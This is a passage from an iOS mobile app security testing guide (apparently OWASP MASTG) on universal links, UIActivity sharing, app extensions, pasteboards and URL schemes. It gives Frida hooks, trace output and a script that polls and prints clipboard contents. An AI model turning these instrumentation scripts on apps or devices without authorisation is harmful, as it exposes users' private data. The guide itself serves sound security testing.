You can see that only one function was found and is being instrumented. Trigger now the universal link and observe the traces.
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n
You can observe that the function is in fact being called. You can now add code to the stubs in __handlers__/
to obtain more details:
// __handlers__/__AppDelegate_application_contin_8e36bbb1.js\n\n onEnter: function (log, args, state) {\n log(\"-[AppDelegate application: \" + args[2] + \" continueUserActivity: \" + args[3] +\n \" restorationHandler: \" + args[4] + \"]\");\n log(\"\\tapplication: \" + ObjC.Object(args[2]).toString());\n log(\"\\tcontinueUserActivity: \" + ObjC.Object(args[3]).toString());\n log(\"\\t\\twebpageURL: \" + ObjC.Object(args[3]).webpageURL().toString());\n log(\"\\t\\tactivityType: \" + ObjC.Object(args[3]).activityType().toString());\n log(\"\\t\\tuserInfo: \" + ObjC.Object(args[3]).userInfo().toString());\n log(\"\\trestorationHandler: \" +ObjC.Object(args[4]).toString());\n },\n
The new output is:
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298382 ms application:<Application: 0x10556b3c0>\n298382 ms continueUserActivity:<NSUserActivity: 0x1c4237780>\n298382 ms webpageURL:http://t.me/addstickers/radare\n298382 ms activityType:NSUserActivityTypeBrowsingWeb\n298382 ms userInfo:{\n}\n298382 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n
Apart from the function parameters we have added more information by calling some methods from them to get more details, in this case about the NSUserActivity
. If we look in the Apple Developer Documentation we can see what else we can call from this object.
If you want to know more about which function actually opens the URL and how the data is actually being handled you should keep investigating.
Extend the previous command in order to find out if there are any other functions involved into opening the URL.
frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\n
-i
includes any method. You can also use a glob pattern here (e.g. -i \"*open*Url*\"
means \"include any function containing 'open', then 'Url' and something else\")
Again, we first let frida-trace generate the stubs in __handlers__/
:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\nInstrumenting functions...\n-[AppDelegate application:continueUserActivity:restorationHandler:]\n$S10TelegramUI0A19ApplicationBindingsC16openUniversalUrlyySS_AA0ac4OpenG10Completion...\n$S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData18application...\n$S10TelegramUI31AuthorizationSequenceControllerC7account7strings7openUrl5apiId0J4HashAC0A4Core19...\n...\n
Now you can see a long list of functions but we still don't know which ones will be called. Trigger the universal link again and observe the traces.
/* TID 0x303 */\n298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298619 ms | $S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData\n 18applicationContext20navigationController12dismissInputy0A4Core7AccountC_AA\n 14OpenURLContextOSSSbAA012PresentationK0CAA0a11ApplicationM0C7Display0\n 10NavigationO0CSgyyctF()\n
Apart from the Objective-C method, now there is one Swift function that is also of your interest.
There is probably no documentation for that Swift function but you can just demangle its symbol using swift-demangle
via xcrun
:
xcrun can be used invoke Xcode developer tools from the command-line, without having them in the path. In this case it will locate and run swift-demangle, an Xcode tool that demangles Swift symbols.
$ xcrun swift-demangle S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData\n18applicationContext20navigationController12dismissInputy0A4Core7AccountC_AA14OpenURLContextOSSSbAA0\n12PresentationK0CAA0a11ApplicationM0C7Display010NavigationO0CSgyyctF\n
Resulting in:
---> TelegramUI.openExternalUrl(\n account: TelegramCore.Account, context: TelegramUI.OpenURLContext, url: Swift.String,\n forceExternal: Swift.Bool, presentationData: TelegramUI.PresentationData,\n applicationContext: TelegramUI.TelegramApplicationContext,\n navigationController: Display.NavigationController?, dismissInput: () -> ()) -> ()\n
This not only gives you the class (or module) of the method, its name and the parameters but also reveals the parameter types and return type, so in case you need to dive deeper now you know where to start.
For now we will use this information to properly print the parameters by editing the stub file:
// __handlers__/TelegramUI/_S10TelegramUI15openExternalUrl7_b1a3234e.js\n\n onEnter: function (log, args, state) {\n\n log(\"TelegramUI.openExternalUrl(account: TelegramCore.Account,\n context: TelegramUI.OpenURLContext, url: Swift.String, forceExternal: Swift.Bool,\n presentationData: TelegramUI.PresentationData,\n applicationContext: TelegramUI.TelegramApplicationContext,\n navigationController: Display.NavigationController?, dismissInput: () -> ()) -> ()\");\n log(\"\\taccount: \" + ObjC.Object(args[0]).toString());\n log(\"\\tcontext: \" + ObjC.Object(args[1]).toString());\n log(\"\\turl: \" + ObjC.Object(args[2]).toString());\n log(\"\\tpresentationData: \" + args[3]);\n log(\"\\tapplicationContext: \" + ObjC.Object(args[4]).toString());\n log(\"\\tnavigationController: \" + ObjC.Object(args[5]).toString());\n },\n
This way, the next time we run it we get a much more detailed output:
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298382 ms application:<Application: 0x10556b3c0>\n298382 ms continueUserActivity:<NSUserActivity: 0x1c4237780>\n298382 ms webpageURL:http://t.me/addstickers/radare\n298382 ms activityType:NSUserActivityTypeBrowsingWeb\n298382 ms userInfo:{\n}\n298382 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n\n298619 ms | TelegramUI.openExternalUrl(account: TelegramCore.Account,\ncontext: TelegramUI.OpenURLContext, url: Swift.String, forceExternal: Swift.Bool,\npresentationData: TelegramUI.PresentationData, applicationContext:\nTelegramUI.TelegramApplicationContext, navigationController: Display.NavigationController?,\ndismissInput: () -> ()) -> ()\n298619 ms | account: TelegramCore.Account\n298619 ms | context: nil\n298619 ms | url: http://t.me/addstickers/radare\n298619 ms | presentationData: 0x1c4e40fd1\n298619 ms | applicationContext: nil\n298619 ms | navigationController: TelegramUI.PresentationData\n
There you can observe the following:
application:continueUserActivity:restorationHandler:
from the app delegate as expected.application:continueUserActivity:restorationHandler:
handles the URL but does not open it, it calls TelegramUI.openExternalUrl
for that.https://t.me/addstickers/radare
.You can now keep going and try to trace and verify how the data is being validated. For example, if you have two apps that communicate via universal links you can use this to see if the sending app is leaking sensitive data by hooking these methods in the receiving app. This is especially useful when you don't have the source code as you will be able to retrieve the full URL that you wouldn't see other way as it might be the result of clicking some button or triggering some functionality.
In some cases, you might find data in userInfo
of the NSUserActivity
object. In the previous case there was no data being transferred but it might be the case for other scenarios. To see this, be sure to hook the userInfo
property or access it directly from the continueUserActivity
object in your hook (e.g. by adding a line like this log(\"userInfo:\" + ObjC.Object(args[3]).userInfo().toString());
).
Universal links and Apple's Handoff feature are related:
application:continueUserActivity:restorationHandler:\n
com.apple.developer.associated-domains
entitlement and in the server's apple-app-site-association
file (in both cases via the keyword \"activitycontinuation\":
). See \"Retrieving the Apple App Site Association File\" above for an example.Actually, the previous example in \"Checking How the Links Are Opened\" is very similar to the \"Web Browser-to-Native App Handoff\" scenario described in the \"Handoff Programming Guide\":
If the user is using a web browser on the originating device, and the receiving device is an iOS device with a native app that claims the domain portion of the webpageURL
property, then iOS launches the native app and sends it an NSUserActivity
object with an activityType
value of NSUserActivityTypeBrowsingWeb
. The webpageURL
property contains the URL the user was visiting, while the userInfo
dictionary is empty.
In the detailed output above you can see that NSUserActivity
object we've received meets exactly the mentioned points:
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298382 ms application:<Application: 0x10556b3c0>\n298382 ms continueUserActivity:<NSUserActivity: 0x1c4237780>\n298382 ms webpageURL:http://t.me/addstickers/radare\n298382 ms activityType:NSUserActivityTypeBrowsingWeb\n298382 ms userInfo:{\n}\n298382 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n
This knowledge should help you when testing apps supporting Handoff.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/","title":"Testing UIActivity Sharing","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#sending-items","title":"Sending Items","text":"When testing UIActivity
Sharing you should pay special attention to:
Data sharing via UIActivity
works by creating a UIActivityViewController
and passing it the desired items (URLs, text, a picture) on init(activityItems: applicationActivities:)
.
As we mentioned before, it is possible to exclude some of the sharing mechanisms via the controller's excludedActivityTypes
property. It is highly recommended to do the tests using the latest versions of iOS as the number of activity types that can be excluded can increase. The developers have to be aware of this and explicitly exclude the ones that are not appropriate for the app data. Some activity types might not be even documented like \"Create Watch Face\".
If having the source code, you should take a look at the UIActivityViewController
:
init(activityItems:applicationActivities:)
method.excludedActivityTypes
, if any.If you only have the compiled/installed app, try searching for the previous method and property, for example:
$ rabin2 -zq Telegram\\ X.app/Telegram\\ X | grep -i activityItems\n0x1000df034 45 44 initWithActivityItems:applicationActivities:\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#receiving-items","title":"Receiving Items","text":"When receiving items, you should check:
application:openURL:options:
(or its deprecated version UIApplicationDelegate application:openURL:sourceApplication:annotation:
) in the app delegate.If not having the source code you can still take a look into the Info.plist
file and search for:
UTExportedTypeDeclarations
/UTImportedTypeDeclarations
if the app declares exported/imported custom document types.CFBundleDocumentTypes
to see if the app specifies any document types that it can open.A very complete explanation about the use of these keys can be found on Stackoverflow.
Let's see a real-world example. We will take a File Manager app and take a look at these keys. We used objection here to read the Info.plist
file.
objection --gadget SomeFileManager run ios plist cat Info.plist\n
Note that this is the same as if we would retrieve the IPA from the phone or accessed via e.g. SSH and navigated to the corresponding folder in the IPA / app sandbox. However, with objection we are just one command away from our goal and this can be still considered static analysis.
The first thing we noticed is that app does not declare any imported custom document types but we could find a couple of exported ones:
UTExportedTypeDeclarations = (\n {\n UTTypeConformsTo = (\n \"public.data\"\n );\n UTTypeDescription = \"SomeFileManager Files\";\n UTTypeIdentifier = \"com.some.filemanager.custom\";\n UTTypeTagSpecification = {\n \"public.filename-extension\" = (\n ipa,\n deb,\n zip,\n rar,\n tar,\n gz,\n ...\n key,\n pem,\n p12,\n cer\n );\n };\n }\n);\n
The app also declares the document types it opens as we can find the key CFBundleDocumentTypes
:
CFBundleDocumentTypes = (\n {\n ...\n CFBundleTypeName = \"SomeFileManager Files\";\n LSItemContentTypes = (\n \"public.content\",\n \"public.data\",\n \"public.archive\",\n \"public.item\",\n \"public.database\",\n \"public.calendar-event\",\n ...\n );\n }\n);\n
We can see that this File Manager will try to open anything that conforms to any of the UTIs listed in LSItemContentTypes
and it's ready to open files with the extensions listed in UTTypeTagSpecification/\"public.filename-extension\"
. Please take a note of this because it will be useful if you want to search for vulnerabilities when dealing with the different types of files when performing dynamic analysis.
There are three main things you can easily inspect by performing dynamic instrumentation:
activityItems
: an array of the items being shared. They might be of different types, e.g. one string and one picture to be shared via a messaging app.applicationActivities
: an array of UIActivity
objects representing the app's custom services.excludedActivityTypes
: an array of the Activity Types that are not supported, e.g. postToFacebook
.To achieve this you can do two things:
init(activityItems: applicationActivities:)
) to get the activityItems
and applicationActivities
.excludedActivityTypes
property.Let's see an example using Telegram to share a picture and a text file. First prepare the hooks, we will use the Frida REPL and write a script for this:
Interceptor.attach(\nObjC.classes.\n UIActivityViewController['- initWithActivityItems:applicationActivities:'].implementation, {\n onEnter: function (args) {\n\n printHeader(args)\n\n this.initWithActivityItems = ObjC.Object(args[2]);\n this.applicationActivities = ObjC.Object(args[3]);\n\n console.log(\"initWithActivityItems: \" + this.initWithActivityItems);\n console.log(\"applicationActivities: \" + this.applicationActivities);\n\n },\n onLeave: function (retval) {\n printRet(retval);\n }\n});\n\nInterceptor.attach(\nObjC.classes.UIActivityViewController['- excludedActivityTypes'].implementation, {\n onEnter: function (args) {\n printHeader(args)\n },\n onLeave: function (retval) {\n printRet(retval);\n }\n});\n\nfunction printHeader(args) {\n console.log(Memory.readUtf8String(args[1]) + \" @ \" + args[1])\n};\n\nfunction printRet(retval) {\n console.log('RET @ ' + retval + ': ' );\n try {\n console.log(new ObjC.Object(retval).toString());\n } catch (e) {\n console.log(retval.toString());\n }\n};\n
You can store this as a JavaScript file, e.g. inspect_send_activity_data.js
and load it like this:
frida -U Telegram -l inspect_send_activity_data.js\n
Now observe the output when you first share a picture:
[*] initWithActivityItems:applicationActivities: @ 0x18c130c07\ninitWithActivityItems: (\n \"<UIImage: 0x1c4aa0b40> size {571, 264} orientation 0 scale 1.000000\"\n)\napplicationActivities: nil\nRET @ 0x13cb2b800:\n<UIActivityViewController: 0x13cb2b800>\n\n[*] excludedActivityTypes @ 0x18c0f8429\nRET @ 0x0:\nnil\n
and then a text file:
[*] initWithActivityItems:applicationActivities: @ 0x18c130c07\ninitWithActivityItems: (\n \"<QLActivityItemProvider: 0x1c4a30140>\",\n \"<UIPrintInfo: 0x1c0699a50>\"\n)\napplicationActivities: (\n)\nRET @ 0x13c4bdc00:\n<_UIDICActivityViewController: 0x13c4bdc00>\n\n[*] excludedActivityTypes @ 0x18c0f8429\nRET @ 0x1c001b1d0:\n(\n \"com.apple.UIKit.activity.MarkupAsPDF\"\n)\n
You can see that:
UIImage
and there are no excluded activities.com.apple.UIKit.activity. MarkupAsPDF
is excluded.In the previous example, there were no custom applicationActivities
and only one excluded activity. However, to better illustrate what you can expect from other apps we have shared a picture using another app, here you can see a bunch of application activities and excluded activities (output was edited to hide the name of the originating app):
[*] initWithActivityItems:applicationActivities: @ 0x18c130c07\ninitWithActivityItems: (\n \"<SomeActivityItemProvider: 0x1c04bd580>\"\n)\napplicationActivities: (\n \"<SomeActionItemActivityAdapter: 0x141de83b0>\",\n \"<SomeActionItemActivityAdapter: 0x147971cf0>\",\n \"<SomeOpenInSafariActivity: 0x1479f0030>\",\n \"<SomeOpenInChromeActivity: 0x1c0c8a500>\"\n)\nRET @ 0x142138a00:\n<SomeActivityViewController: 0x142138a00>\n\n[*] excludedActivityTypes @ 0x18c0f8429\nRET @ 0x14797c3e0:\n(\n \"com.apple.UIKit.activity.Print\",\n \"com.apple.UIKit.activity.AssignToContact\",\n \"com.apple.UIKit.activity.SaveToCameraRoll\",\n \"com.apple.UIKit.activity.CopyToPasteboard\",\n)\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#receiving-items_1","title":"Receiving Items","text":"After performing the static analysis you would know the document types that the app can open and if it declares any custom document types and (part of) the methods involved. You can use this now to test the receiving part:
application:openURL:options:
and any other methods that were identified in a previous static analysis.To illustrate this with an example we have chosen the same real-world file manager app from the static analysis section and followed these steps:
As there is no default app that will open the file, it switches to the Open with... popup. There, we can select the app that will open our file. The next screenshot shows this (we have modified the display name using Frida to conceal the app's real name):
After selecting SomeFileManager we can see the following:
(0x1c4077000) -[AppDelegate application:openURL:options:]\napplication: <UIApplication: 0x101c00950>\nopenURL: file:///var/mobile/Library/Application%20Support\n /Containers/com.some.filemanager/Documents/Inbox/OWASP_MASVS.pdf\noptions: {\n UIApplicationOpenURLOptionsAnnotationKey = {\n LSMoveDocumentOnOpen = 1;\n };\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.sharingd\";\n \"_UIApplicationOpenURLOptionsSourceProcessHandleKey\" = \"<FBSProcessHandle: 0x1c3a63140;\n sharingd:605; valid: YES>\";\n}\n0x18c7930d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n...\n0x1857cdc34 FrontBoardServices!-[FBSSerialQueue _performNextFromRunLoopSource]\nRET: 0x1\n
As you can see, the sending application is com.apple.sharingd
and the URL's scheme is file://
. Note that once we select the app that should open the file, the system already moved the file to the corresponding destination, that is to the app's Inbox. The apps are then responsible for deleting the files inside their Inboxes. This app, for example, moves the file to /var/mobile/Documents/
and removes it from the Inbox.
(0x1c002c760) -[XXFileManager moveItemAtPath:toPath:error:]\nmoveItemAtPath: /var/mobile/Library/Application Support/Containers\n /com.some.filemanager/Documents/Inbox/OWASP_MASVS.pdf\ntoPath: /var/mobile/Documents/OWASP_MASVS (1).pdf\nerror: 0x16f095bf8\n0x100f24e90 SomeFileManager!-[AppDelegate __handleOpenURL:]\n0x100f25198 SomeFileManager!-[AppDelegate application:openURL:options:]\n0x18c7930d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n...\n0x1857cd9f4 FrontBoardServices!__FBSSERIALQUEUE_IS_CALLING_OUT_TO_A_BLOCK__\nRET: 0x1\n
If you look at the stack trace, you can see how application:openURL:options:
called __handleOpenURL:
, which called moveItemAtPath:toPath:error:
. Notice that we have now this information without having the source code for the target app. The first thing that we had to do was clear: hook application:openURL:options:
. Regarding the rest, we had to think a little bit and come up with methods that we could start tracing and are related to the file manager, for example, all methods containing the strings \"copy\", \"move\", \"remove\", etc. until we have found that the one being called was moveItemAtPath:toPath:error:
.
A final thing worth noticing here is that this way of handling incoming files is the same for custom URL schemes. Please refer to the \"Testing Custom URL Schemes\" section for more information.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/","title":"Testing App Extensions","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#static-analysis","title":"Static Analysis","text":"The static analysis will take care of:
If you have the original source code you can search for all occurrences of NSExtensionPointIdentifier
with Xcode (cmd+shift+f) or take a look into \"Build Phases / Embed App extensions\":
There you can find the names of all embedded app extensions followed by .appex
, now you can navigate to the individual app extensions in the project.
If not having the original source code:
Grep for NSExtensionPointIdentifier
among all files inside the app bundle (IPA or installed app):
$ grep -nr NSExtensionPointIdentifier Payload/Telegram\\ X.app/\nBinary file Payload/Telegram X.app//PlugIns/SiriIntents.appex/Info.plist matches\nBinary file Payload/Telegram X.app//PlugIns/Share.appex/Info.plist matches\nBinary file Payload/Telegram X.app//PlugIns/NotificationContent.appex/Info.plist matches\nBinary file Payload/Telegram X.app//PlugIns/Widget.appex/Info.plist matches\nBinary file Payload/Telegram X.app//Watch/Watch.app/PlugIns/Watch Extension.appex/Info.plist matches\n
You can also access per SSH, find the app bundle and list all inside PlugIns (they are placed there by default) or do it with objection:
ph.telegra.Telegraph on (iPhone: 11.1.2) [usb] # cd PlugIns\n /var/containers/Bundle/Application/15E6A58F-1CA7-44A4-A9E0-6CA85B65FA35/\n Telegram X.app/PlugIns\n\nph.telegra.Telegraph on (iPhone: 11.1.2) [usb] # ls\nNSFileType Perms NSFileProtection Read Write Name\n------------ ------- ------------------ ------ ------- -------------------------\nDirectory 493 None True False NotificationContent.appex\nDirectory 493 None True False Widget.appex\nDirectory 493 None True False Share.appex\nDirectory 493 None True False SiriIntents.appex\n
We can see now the same four app extensions that we saw in Xcode before.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#determining-the-supported-data-types","title":"Determining the Supported Data Types","text":"This is important for data being shared with host apps (e.g. via Share or Action Extensions). When the user selects some data type in a host app and it matches the data types define here, the host app will offer the extension. It is worth noticing the difference between this and data sharing via UIActivity
where we had to define the document types, also using UTIs. An app does not need to have an extension for that. It is possible to share data using only UIActivity
.
Inspect the app extension's Info.plist
file and search for NSExtensionActivationRule
. That key specifies the data being supported as well as e.g. maximum of items supported. For example:
<key>NSExtensionAttributes</key>\n <dict>\n <key>NSExtensionActivationRule</key>\n <dict>\n <key>NSExtensionActivationSupportsImageWithMaxCount</key>\n <integer>10</integer>\n <key>NSExtensionActivationSupportsMovieWithMaxCount</key>\n <integer>1</integer>\n <key>NSExtensionActivationSupportsWebURLWithMaxCount</key>\n <integer>1</integer>\n </dict>\n </dict>\n
Only the data types present here and not having 0
as MaxCount
will be supported. However, more complex filtering is possible by using a so-called predicate string that will evaluate the UTIs given. Please refer to the Apple App Extension Programming Guide for more detailed information about this.
Remember that app extensions and their containing apps do not have direct access to each other\u2019s containers. However, data sharing can be enabled. This is done via \"App Groups\" and the NSUserDefaults
API. See this figure from Apple App Extension Programming Guide:
As also mentioned in the guide, the app must set up a shared container if the app extension uses the NSURLSession
class to perform a background upload or download, so that both the extension and its containing app can access the transferred data.
It is possible to reject a specific type of app extension by using the following method:
application:shouldAllowExtensionPointIdentifier:
However, it is currently only possible for \"custom keyboard\" app extensions (and should be verified when testing apps handling sensitive data via the keyboard like e.g. banking apps).
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#dynamic-analysis","title":"Dynamic Analysis","text":"For the dynamic analysis we can do the following to gain knowledge without having the source code:
For this we should hook NSExtensionContext - inputItems
in the data originating app.
Following the previous example of Telegram we will now use the \"Share\" button on a text file (that was received from a chat) to create a note in the Notes app with it:
If we run a trace, we'd see the following output:
(0x1c06bb420) NSExtensionContext - inputItems\n0x18284355c Foundation!-[NSExtension _itemProviderForPayload:extensionContext:]\n0x1828447a4 Foundation!-[NSExtension _loadItemForPayload:contextIdentifier:completionHandler:]\n0x182973224 Foundation!__NSXPCCONNECTION_IS_CALLING_OUT_TO_EXPORTED_OBJECT_S3__\n0x182971968 Foundation!-[NSXPCConnection _decodeAndInvokeMessageWithEvent:flags:]\n0x182748830 Foundation!message_handler\n0x181ac27d0 libxpc.dylib!_xpc_connection_call_event_handler\n0x181ac0168 libxpc.dylib!_xpc_connection_mach_event\n...\nRET: (\n\"<NSExtensionItem: 0x1c420a540> - userInfo:\n{\n NSExtensionItemAttachmentsKey = (\n \"<NSItemProvider: 0x1c46b30e0> {types = (\\n \\\"public.plain-text\\\",\\n \\\"public.file-url\\\"\\n)}\"\n );\n}\"\n)\n
Here we can observe that:
NSXPCConnection
that uses the libxpc.dylib
Framework.NSItemProvider
are public.plain-text
and public.file-url
, the latter being included in NSExtensionActivationRule
from the Info.plist
of the \"Share Extension\" of Telegram.You can also find out which app extension is taking care of your the requests and responses by hooking NSExtension - _plugIn
:
We run the same example again:
(0x1c0370200) NSExtension - _plugIn\nRET: <PKPlugin: 0x1163637f0 ph.telegra.Telegraph.Share(5.3) 5B6DE177-F09B-47DA-90CD-34D73121C785\n1(2) /private/var/containers/Bundle/Application/15E6A58F-1CA7-44A4-A9E0-6CA85B65FA35\n/Telegram X.app/PlugIns/Share.appex>\n\n(0x1c0372300) -[NSExtension _plugIn]\nRET: <PKPlugin: 0x10bff7910 com.apple.mobilenotes.SharingExtension(1.5) 73E4F137-5184-4459-A70A-83\nF90A1414DC 1(2) /private/var/containers/Bundle/Application/5E267B56-F104-41D0-835B-F1DAB9AE076D\n/MobileNotes.app/PlugIns/com.apple.mobilenotes.SharingExtension.appex>\n
As you can see there are two app extensions involved:
Share.appex
is sending the text file (public.plain-text
and public.file-url
).com.apple.mobilenotes.SharingExtension.appex
which is receiving and will process the text file.If you want to learn more about what's happening under-the-hood in terms of XPC, we recommend to take a look at the internal calls from \"libxpc.dylib\". For example you can use frida-trace
and then dig deeper into the methods that you find more interesting by extending the automatically generated stubs.
The systemwide general pasteboard can be obtained by using generalPasteboard
, search the source code or the compiled binary for this method. Using the systemwide general pasteboard should be avoided when dealing with sensitive data.
Custom pasteboards can be created with pasteboardWithName:create:
or pasteboardWithUniqueName
. Verify if custom pasteboards are set to be persistent as this is deprecated since iOS 10. A shared container should be used instead.
In addition, the following can be inspected:
removePasteboardWithName:
, which invalidates an app pasteboard, freeing up all resources used by it (no effect for the general pasteboard).setItems:options:
with the UIPasteboardOptionLocalOnly
option.setItems:options:
with the UIPasteboardOptionExpirationDate
option.Hook or trace the following:
generalPasteboard
for the system-wide general pasteboard.pasteboardWithName:create:
and pasteboardWithUniqueName
for custom pasteboards.Hook or trace the deprecated setPersistent:
method and verify if it's being called.
When monitoring the pasteboards, there is several details that may be dynamically retrieved:
pasteboardWithName:create:
and inspecting its input parameters or pasteboardWithUniqueName
and inspecting its return value.string
method. Or use any of the other methods for the standard data types.numberOfItems
.hasImages
, hasStrings
, hasURLs
(starting in iOS 10).containsPasteboardTypes: inItemSet:
. You may inspect for more concrete data types like, for example an picture as public.png and public.tiff (UTIs) or for custom data such as com.mycompany.myapp.mytype. Remember that, in this case, only those apps that declare knowledge of the type are able to understand the data written to the pasteboard. This is the same as we have seen in the \"UIActivity Sharing\" section. Retrieve them using itemSetWithPasteboardTypes:
and setting the corresponding UTIs.setItems:options:
and inspecting its options for UIPasteboardOptionLocalOnly
or UIPasteboardOptionExpirationDate
.If only looking for strings you may want to use objection's command ios pasteboard monitor
:
Hooks into the iOS UIPasteboard class and polls the generalPasteboard every 5 seconds for data. If new data is found, different from the previous poll, that data will be dumped to screen.
You may also build your own pasteboard monitor that monitors specific information as seen above.
For example, this script (inspired from the script behind objection's pasteboard monitor) reads the pasteboard items every 5 seconds, if there's something new it will print it:
const UIPasteboard = ObjC.classes.UIPasteboard;\n const Pasteboard = UIPasteboard.generalPasteboard();\n var items = \"\";\n var count = Pasteboard.changeCount().toString();\n\nsetInterval(function () {\n const currentCount = Pasteboard.changeCount().toString();\n const currentItems = Pasteboard.items().toString();\n\n if (currentCount === count) { return; }\n\n items = currentItems;\n count = currentCount;\n\n console.log('[* Pasteboard changed] count: ' + count +\n ' hasStrings: ' + Pasteboard.hasStrings().toString() +\n ' hasURLs: ' + Pasteboard.hasURLs().toString() +\n ' hasImages: ' + Pasteboard.hasImages().toString());\n console.log(items);\n\n }, 1000 * 5);\n
In the output we can see the following:
[* Pasteboard changed] count: 64 hasStrings: true hasURLs: false hasImages: false\n(\n {\n \"public.utf8-plain-text\" = hola;\n }\n)\n[* Pasteboard changed] count: 65 hasStrings: true hasURLs: true hasImages: false\n(\n {\n \"public.url\" = \"https://codeshare.frida.re/\";\n \"public.utf8-plain-text\" = \"https://codeshare.frida.re/\";\n }\n)\n[* Pasteboard changed] count: 66 hasStrings: false hasURLs: false hasImages: true\n(\n {\n \"com.apple.uikit.image\" = \"<UIImage: 0x1c42b23c0> size {571, 264} orientation 0 scale 1.000000\";\n \"public.jpeg\" = \"<UIImage: 0x1c44a1260> size {571, 264} orientation 0 scale 1.000000\";\n \"public.png\" = \"<UIImage: 0x1c04aaaa0> size {571, 264} orientation 0 scale 1.000000\";\n }\n)\n
You see that first a text was copied including the string \"hola\", after that a URL was copied and finally a picture was copied. Some of them are available via different UTIs. Other apps will consider these UTIs to allow pasting of this data or not.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/","title":"Testing Custom URL Schemes","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#static-analysis","title":"Static Analysis","text":"There are a couple of things that we can do using static analysis. In the next sections we will see the following:
The first step to test custom URL schemes is finding out whether an application registers any protocol handlers.
If you have the original source code and want to view registered protocol handlers, simply open the project in Xcode, go to the Info tab and open the URL Types section as presented in the screenshot below:
Also in Xcode you can find this by searching for the CFBundleURLTypes
key in the app\u2019s Info.plist
file (example from iGoat-Swift):
<key>CFBundleURLTypes</key>\n<array>\n <dict>\n <key>CFBundleURLName</key>\n <string>com.iGoat.myCompany</string>\n <key>CFBundleURLSchemes</key>\n <array>\n <string>iGoat</string>\n </array>\n </dict>\n</array>\n
In a compiled application (or IPA), registered protocol handlers are found in the file Info.plist
in the app bundle's root folder. Open it and search for the CFBundleURLSchemes
key, if present, it should contain an array of strings (example from iGoat-Swift):
grep -A 5 -nri urlsch Info.plist\nInfo.plist:45: <key>CFBundleURLSchemes</key>\nInfo.plist-46- <array>\nInfo.plist-47- <string>iGoat</string>\nInfo.plist-48- </array>\n
Once the URL scheme is registered, other apps can open the app that registered the scheme, and pass parameters by creating appropriately formatted URLs and opening them with the UIApplication openURL:options:completionHandler:
method.
Note from the App Programming Guide for iOS:
If more than one third-party app registers to handle the same URL scheme, there is currently no process for determining which app will be given that scheme.
This could lead to a URL scheme hijacking attack (see page 136 in [#thiel2]).
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-application-query-schemes-registration","title":"Testing Application Query Schemes Registration","text":"Before calling the openURL:options:completionHandler:
method, apps can call canOpenURL:
to verify that the target app is available. However, as this method was being used by malicious app as a way to enumerate installed apps, from iOS 9.0 the URL schemes passed to it must be also declared by adding the LSApplicationQueriesSchemes
key to the app's Info.plist
file and an array of up to 50 URL schemes.
<key>LSApplicationQueriesSchemes</key>\n <array>\n <string>url_scheme1</string>\n <string>url_scheme2</string>\n </array>\n
canOpenURL
will always return NO
for undeclared schemes, whether or not an appropriate app is installed. However, this restriction only applies to canOpenURL
.
The openURL:options:completionHandler:
method will still open any URL scheme, even if the LSApplicationQueriesSchemes
array was declared, and return YES
/ NO
depending on the result.
As an example, Telegram declares in its Info.plist
these Queries Schemes, among others:
<key>LSApplicationQueriesSchemes</key>\n <array>\n <string>dbapi-3</string>\n <string>instagram</string>\n <string>googledrive</string>\n <string>comgooglemaps-x-callback</string>\n <string>foursquare</string>\n <string>here-location</string>\n <string>yandexmaps</string>\n <string>yandexnavi</string>\n <string>comgooglemaps</string>\n <string>youtube</string>\n <string>twitter</string>\n ...\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-url-handling-and-validation","title":"Testing URL Handling and Validation","text":"In order to determine how a URL path is built and validated, if you have the original source code, you can search for the following methods:
application:didFinishLaunchingWithOptions:
method or application:will-FinishLaunchingWithOptions:
: verify how the decision is made and how the information about the URL is retrieved.application:openURL:options:
: verify how the resource is being opened, i.e. how the data is being parsed, verify the options, especially if access by the calling app (sourceApplication
) should be allowed or denied. The app might also need user permission when using the custom URL scheme.In Telegram you will find four different methods being used:
